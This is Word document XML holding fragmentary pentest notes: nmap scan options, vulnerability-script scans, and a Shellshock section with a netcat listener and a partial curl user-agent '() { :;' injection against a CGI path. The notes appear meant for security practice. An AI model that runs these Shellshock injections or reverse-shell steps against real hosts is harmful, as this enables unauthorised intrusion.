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U:53,T21-25,80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5D1C7FB5" w14:textId="77777777" w:rsidR="00094909" w:rsidRPr="00094909" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:r w:rsidRPr="00094909">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00094909">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00094909">
        <w:t xml:space="preserve"> [ very verbose ]</w:t>
      </w:r>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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00094909">
        <w:t>eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00094909">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABC5BA3" w14:textId="77777777" w:rsidR="00094909" w:rsidRPr="00094909" w:rsidRDefault="00094909" w:rsidP="00094909"/>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77777777" w:rsidR="00094909" w:rsidRPr="00094909" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:r w:rsidRPr="00094909">
        <w:t>``````````````````````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4AFEE3" w14:textId="77777777" w:rsidR="00094909" w:rsidRPr="00094909" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:r w:rsidRPr="00094909">
        <w:t># cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00094909">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00094909">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00094909">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00094909">
        <w:t>/</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-mac-prefixes : Contain MAC prefix to detect manufacturer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD1AC88" w14:textId="77777777" w:rsidR="00094909" w:rsidRPr="00094909" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00094909">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00094909">
        <w:t>-protocols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lastRenderedPageBreak/>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7777777" w:rsidR="005E4ED1" w:rsidRPr="005E4ED1" w:rsidRDefault="005E4ED1" w:rsidP="005E4ED1">
      <w:r w:rsidRPr="005E4ED1">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cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4ED1">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5E4ED1">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t>sSV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t xml:space="preserve"> --script=rdp-vuln-ms12-020 target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5E4ED1">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t>sSVC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t xml:space="preserve"> target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5E4ED1">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t>sSV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t xml:space="preserve"> --script vuln target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CE792C" w14:textId="77777777" w:rsidR="005E4ED1" w:rsidRPr="005E4ED1" w:rsidRDefault="005E4ED1" w:rsidP="005E4ED1">
      <w:r w:rsidRPr="005E4ED1">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t>sSV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4ED1">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77777777" w:rsidR="005E4ED1" w:rsidRPr="005E4ED1" w:rsidRDefault="005E4ED1" w:rsidP="005E4ED1">
      <w:r w:rsidRPr="005E4ED1">
        <w:t>``````````````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0DF015" w14:textId="77777777" w:rsidR="005E4ED1" w:rsidRPr="005E4ED1" w:rsidRDefault="005E4ED1" w:rsidP="005E4ED1">
      <w:r w:rsidRPr="005E4ED1">
        <w:lastRenderedPageBreak/>
        <w:t>vulnerability: SHELLSHOCK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C03025" w14:textId="77777777" w:rsidR="005E4ED1" w:rsidRPr="005E4ED1" w:rsidRDefault="005E4ED1" w:rsidP="005E4ED1"/>
    <w:p w14:paraId="6303BF1A" w14:textId="77777777" w:rsidR="005E4ED1" w:rsidRPr="005E4ED1" w:rsidRDefault="005E4ED1" w:rsidP="005E4ED1">
      <w:r w:rsidRPr="005E4ED1">
        <w:t xml:space="preserve">Google:  2014 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C7231C" w14:textId="77777777" w:rsidR="005E4ED1" w:rsidRPr="005E4ED1" w:rsidRDefault="005E4ED1" w:rsidP="005E4ED1"/>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t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spell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lastRenderedPageBreak/>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listening  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spell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curl -A '() { :;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Default="004F74D8" w:rsidP="004F74D8">
      <w:r w:rsidRPr="004F74D8">
        <w:t>NESSUS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAD263C" w14:textId="77777777" w:rsidR="004F74D8" w:rsidRDefault="004F74D8" w:rsidP="004F74D8">
      <w:r w:rsidRPr="004F74D8">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lastRenderedPageBreak/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>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w:t>
      </w:r>
      <w:r>
        <w:t>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5C19DB2C" w14:textId="77777777" w:rsidR="00B4531B" w:rsidRPr="004F74D8" w:rsidRDefault="00B4531B" w:rsidP="00B4531B"/>
    <w:p w14:paraId="78328EDB" w14:textId="77777777" w:rsidR="004F74D8" w:rsidRPr="004F74D8" w:rsidRDefault="004F74D8" w:rsidP="00D55301"/>
    <w:p w14:paraId="59A96A86" w14:textId="77777777" w:rsidR="00D55301" w:rsidRDefault="00D55301"/>
    <w:sectPr w:rsidR="00D553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814DF"/>
    <w:rsid w:val="00094909"/>
    <w:rsid w:val="00381DAA"/>
    <w:rsid w:val="003A19A9"/>
    <w:rsid w:val="003D06B3"/>
    <w:rsid w:val="004F74D8"/>
    <w:rsid w:val="005E4ED1"/>
    <w:rsid w:val="00857154"/>
    <w:rsid w:val="008A14C6"/>
    <w:rsid w:val="009440C9"/>
    <w:rsid w:val="00980C67"/>
    <w:rsid w:val="00A51E32"/>
    <w:rsid w:val="00B030E4"/>
    <w:rsid w:val="00B4531B"/>
    <w:rsid w:val="00D55301"/>
    <w:rsid w:val="00DE40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92.168.46.234/cgi-bin/dheer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12</Pages>
  <Words>1723</Words>
  <Characters>9826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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-10T12:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-13T12:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>